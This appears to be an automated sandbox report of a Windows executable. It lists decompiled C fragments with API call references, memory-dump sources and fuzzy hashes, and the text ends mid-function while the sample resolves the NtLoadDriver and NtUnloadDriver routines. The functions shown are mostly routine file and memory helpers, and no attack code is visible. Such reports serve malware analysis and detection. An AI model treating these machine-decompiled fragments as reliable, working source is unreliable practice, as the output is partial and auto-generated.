                                                                                                                                                      				_t8 = WriteFile(_a4, _a8, wcslen(_a8) + _t6,  &_v8, 0); // executed
                                                                                                                                                      				return _t8;
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                      • wcslen.MSVCRT ref: 00405377
                                                                                                                                                      • WriteFile.KERNELBASE(?,00000003,00000000,00000001,00000000,?,?,00408878,?,00000003,?,00409C9C,?,[,?,0040977A), ref: 00405386
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWritewcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3657313286-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 80%
                                                                                                                                                      			E00406729(signed int __edi, signed int* __esi) {
                                                                                                                                                      				signed int _t4;
                                                                                                                                                      				signed int _t9;
                                                                                                                                                      				signed int* _t10;
                                                                                                                                                      
                                                                                                                                                      				_t10 = __esi;
                                                                                                                                                      				_t9 = __edi;
                                                                                                                                                      				_t4 =  *__esi;
                                                                                                                                                      				if(_t4 != 0) {
                                                                                                                                                      					_push(_t4);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      					 *__esi =  *__esi & 0x00000000;
                                                                                                                                                      					__esi[1] = __esi[1] & 0x00000000;
                                                                                                                                                      				}
                                                                                                                                                      				_push(_t9); // executed
                                                                                                                                                      				L0040E038(); // executed
                                                                                                                                                      				 *_t10 = _t4;
                                                                                                                                                      				_t10[1] = _t9;
                                                                                                                                                      				return 1;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1936579350-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040623E(intOrPtr* __esi) {
                                                                                                                                                      
                                                                                                                                                      				free( *(__esi + 0x10)); // executed
                                                                                                                                                      				free( *(__esi + 0xc)); // executed
                                                                                                                                                      				 *((intOrPtr*)(__esi)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                                                                                                      				 *(__esi + 0xc) = 0;
                                                                                                                                                      				 *(__esi + 0x10) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                                                                                      				return 0;
                                                                                                                                                      			}




                                                                                                                                                      APIs
                                                                                                                                                      • free.MSVCRT(?,004064D9,74784E00,?,00000000), ref: 00406241
                                                                                                                                                      • free.MSVCRT(?,?,004064D9,74784E00,?,00000000), ref: 00406249
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 0040D6B5
                                                                                                                                                        • Part of subcall function 0040D51E: memset.MSVCRT ref: 0040D53D
                                                                                                                                                        • Part of subcall function 0040D51E: _itow.MSVCRT ref: 0040D554
                                                                                                                                                        • Part of subcall function 0040D51E: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040D563
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E0040D049(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr* _t6;
                                                                                                                                                      				void* _t8;
                                                                                                                                                      				struct HINSTANCE__** _t10;
                                                                                                                                                      
                                                                                                                                                      				_t10 = __eax;
                                                                                                                                                      				E0040D071(__eax);
                                                                                                                                                      				_t1 = _t10 + 0x14; // 0x8d000001
                                                                                                                                                      				_t6 =  *_t1;
                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                                                                                      				return _t8;
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040D071: LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,747859F0,0040CF75,?,?), ref: 0040D07C
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC
                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0040CF75,00000104,0040CF75,?,?), ref: 0040D068
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$FileLibraryLoadModuleName
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3821362017-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405E43(void* __ecx, void* _a4, void* _a8, long _a12) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				int _t8;
                                                                                                                                                      
                                                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                                                      				_t8 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
                                                                                                                                                      				return _t8;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405E62(void* __ecx, void* _a4, void* _a8, long _a12) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				int _t8;
                                                                                                                                                      
                                                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                                                      				_t8 = WriteFile(_a4, _a8, _a12,  &_v8, 0); // executed
                                                                                                                                                      				return _t8;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • WriteFile.KERNELBASE(?,?,74784E00,00000000,00000000,?,?,00409760,00000000,0040FF4C,00000002,?,?,00000001,0040BE1B,0040F454), ref: 00405E79
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E00406710(signed int* __ecx) {
                                                                                                                                                      				signed int _t3;
                                                                                                                                                      
                                                                                                                                                      				_t3 =  *__ecx;
                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                      					_push(_t3); // executed
                                                                                                                                                      					L0040E032(); // executed
                                                                                                                                                      					 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                      					__ecx[1] = __ecx[1] & 0x00000000;
                                                                                                                                                      					return _t3;
                                                                                                                                                      				}
                                                                                                                                                      				return _t3;
                                                                                                                                                      			}





                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405351(WCHAR* _a4) {
                                                                                                                                                      				void* _t3;
                                                                                                                                                      
                                                                                                                                                      				_t3 = CreateFileW(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
                                                                                                                                                      				return _t3;
                                                                                                                                                      			}





                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405338(WCHAR* _a4) {
                                                                                                                                                      				void* _t3;
                                                                                                                                                      
                                                                                                                                                      				_t3 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                                      				return _t3;
                                                                                                                                                      			}





                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040DA82(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                                                      
                                                                                                                                                      				EnumResourceNamesW(_a4, _a8, E0040D9FC, 0); // executed
                                                                                                                                                      				return 1;
                                                                                                                                                      			}




                                                                                                                                                      APIs
                                                                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,0040D9FC,00000000), ref: 0040DA91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040405E(void** __esi) {
                                                                                                                                                      				void* _t1;
                                                                                                                                                      				signed int* _t2;
                                                                                                                                                      
                                                                                                                                                      				_t2 = __esi;
                                                                                                                                                      				_t1 =  *__esi;
                                                                                                                                                      				if(_t1 != 0xffffffff) {
                                                                                                                                                      					_t1 = FindCloseChangeNotification(_t1); // executed
                                                                                                                                                      				}
                                                                                                                                                      				 *_t2 =  *_t2 | 0xffffffff;
                                                                                                                                                      				return _t1;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                      • Opcode ID: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
                                                                                                                                                      • Instruction ID: 40547022017336ee125913f65e591b655fd6556432e54264b79cbfeb0dc3c2d4
                                                                                                                                                      • Opcode Fuzzy Hash: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
                                                                                                                                                      • Instruction Fuzzy Hash: ECB09270500541CBE6345F78884980A7AA4AA813703B44B28A1F6F10F2D33888468A14
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004057D1(WCHAR* _a4) {
                                                                                                                                                      				long _t4;
                                                                                                                                                      
                                                                                                                                                      				_t4 = GetFileAttributesW(_a4); // executed
                                                                                                                                                      				return 0 | _t4 != 0xffffffff;
                                                                                                                                                      			}





                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                      • Opcode ID: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
                                                                                                                                                      • Instruction ID: f1cceac889999bb919f5bca999730fd8e3c757b1acafb66fb331f39110631968
                                                                                                                                                      • Opcode Fuzzy Hash: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
                                                                                                                                                      • Instruction Fuzzy Hash: FFB012B52100014BCB1807349D4508D35905F44631B31873CB037D0CF0E730CCA8BA00
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E004048DA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, void** _a12) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t20;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                      				intOrPtr _t31;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void** _t40;
                                                                                                                                                      				intOrPtr* _t47;
                                                                                                                                                      
                                                                                                                                                      				_t38 = __edx;
                                                                                                                                                      				_t34 = __ecx;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t44 = _a4;
                                                                                                                                                      				_t40 = _a12;
                                                                                                                                                      				_t31 = 0;
                                                                                                                                                      				 *((intOrPtr*)(_a4 + 0x248)) = _t40;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				if( *((intOrPtr*)(_t40 + 0x428)) <= 0) {
                                                                                                                                                      					L3:
                                                                                                                                                      					_t20 = 0;
                                                                                                                                                      					L4:
                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                      						_t22 = E00404489(_t44 + 0x14, _t34, _t38, _t40, _t20); // executed
                                                                                                                                                      						_t53 = _t22;
                                                                                                                                                      						if(_t22 != 0) {
                                                                                                                                                      							E00406729( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x418)) + 0xec)), _t44 + 4);
                                                                                                                                                      							_t47 = _a4;
                                                                                                                                                      							_t25 = E00404689(_a12, _t53,  *((intOrPtr*)(_t47 + 0x220)),  *((intOrPtr*)(_t44 + 4))); // executed
                                                                                                                                                      							 *_t47 = _t25;
                                                                                                                                                      							 *((intOrPtr*)(_t47 + 0x10)) = 1;
                                                                                                                                                      							_v8 = 1;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _v8;
                                                                                                                                                      				} else {
                                                                                                                                                      					goto L1;
                                                                                                                                                      				}
                                                                                                                                                      				while(1) {
                                                                                                                                                      					L1:
                                                                                                                                                      					_t29 = E00403F2B(_t31, _t40 + 0x41c);
                                                                                                                                                      					_push(_a8);
                                                                                                                                                      					_v12 = _t29;
                                                                                                                                                      					L0040E03E();
                                                                                                                                                      					_t34 = _t29;
                                                                                                                                                      					if(_t29 == 0) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					_t31 = _t31 + 1;
                                                                                                                                                      					if(_t31 <  *((intOrPtr*)(_t40 + 0x428))) {
                                                                                                                                                      						continue;
                                                                                                                                                      					}
                                                                                                                                                      					goto L3;
                                                                                                                                                      				}
                                                                                                                                                      				_t20 = _v12;
                                                                                                                                                      				goto L4;
                                                                                                                                                      			}

















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2081463915-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403FDE(void** __eax, void* __eflags, WCHAR* _a4) {
                                                                                                                                                      				void* __ecx;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				intOrPtr _t15;
                                                                                                                                                      				intOrPtr* _t16;
                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                      
                                                                                                                                                      				_t22 = __eax;
                                                                                                                                                      				 *(__eax + 0x414) =  *(__eax + 0x414) & 0x00000000;
                                                                                                                                                      				E0040405E(__eax);
                                                                                                                                                      				_t11 = E00405338(_a4);
                                                                                                                                                      				 *_t22 = _t11;
                                                                                                                                                      				if(_t11 == 0xffffffff) {
                                                                                                                                                      					L7:
                                                                                                                                                      					 *((intOrPtr*)(_t22 + 0x414)) = GetLastError();
                                                                                                                                                      					L8:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t14 = E00405E43(_t22 + 4, _t11, _t22 + 4, 0x400); // executed
                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                      					goto L7;
                                                                                                                                                      				}
                                                                                                                                                      				_t15 =  *((intOrPtr*)(_t22 + 0x418));
                                                                                                                                                      				if( *((intOrPtr*)(_t15 + 4)) == 0x89abcdef) {
                                                                                                                                                      					_t16 = _t15 + 0xec;
                                                                                                                                                      					__eflags =  *_t16;
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						 *_t16 = 0x1000;
                                                                                                                                                      					}
                                                                                                                                                      					E00404541(__eflags, _t22); // executed
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				 *((intOrPtr*)(_t22 + 0x414)) = 0xfff1;
                                                                                                                                                      				goto L8;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040405E: FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066
                                                                                                                                                        • Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00403B9A,?), ref: 0040404B
                                                                                                                                                        • Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$ChangeCloseCreateErrorFindLastNotificationRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4176926985-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406355(signed int* __esi) {
                                                                                                                                                      				void* _t5;
                                                                                                                                                      				signed int* _t7;
                                                                                                                                                      
                                                                                                                                                      				_t7 = __esi;
                                                                                                                                                      				_t5 =  *__esi;
                                                                                                                                                      				if(_t5 != 0) {
                                                                                                                                                      					free(_t5); // executed
                                                                                                                                                      					 *__esi =  *__esi & 0x00000000;
                                                                                                                                                      				}
                                                                                                                                                      				_t7[1] = _t7[1] & 0x00000000;
                                                                                                                                                      				_t7[2] = _t7[2] & 0x00000000;
                                                                                                                                                      				return _t5;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • free.MSVCRT(00000000,004065BB,74784E00,?,00000000), ref: 0040635C
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403F55(void** __esi) {
                                                                                                                                                      				void* _t5;
                                                                                                                                                      				signed int* _t7;
                                                                                                                                                      
                                                                                                                                                      				_t7 = __esi;
                                                                                                                                                      				_t5 =  *__esi;
                                                                                                                                                      				if(_t5 != 0) {
                                                                                                                                                      					free(_t5); // executed
                                                                                                                                                      				}
                                                                                                                                                      				 *_t7 =  *_t7 & 0x00000000;
                                                                                                                                                      				_t7[3] = _t7[3] & 0x00000000;
                                                                                                                                                      				_t7[1] = _t7[1] & 0x00000000;
                                                                                                                                                      				return _t5;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040C41D() {
                                                                                                                                                      				void* _t1;
                                                                                                                                                      				struct HINSTANCE__* _t2;
                                                                                                                                                      				_Unknown_base(*)()* _t14;
                                                                                                                                                      
                                                                                                                                                      				if( *0x4132c4 == 0) {
                                                                                                                                                      					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                                                                                      					 *0x4132c4 = _t2;
                                                                                                                                                      					 *0x413294 = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                                                                                      					 *0x413298 = GetProcAddress( *0x4132c4, "NtLoadDriver");
                                                                                                                                                      					 *0x41329c = GetProcAddress( *0x4132c4, "NtUnloadDriver");
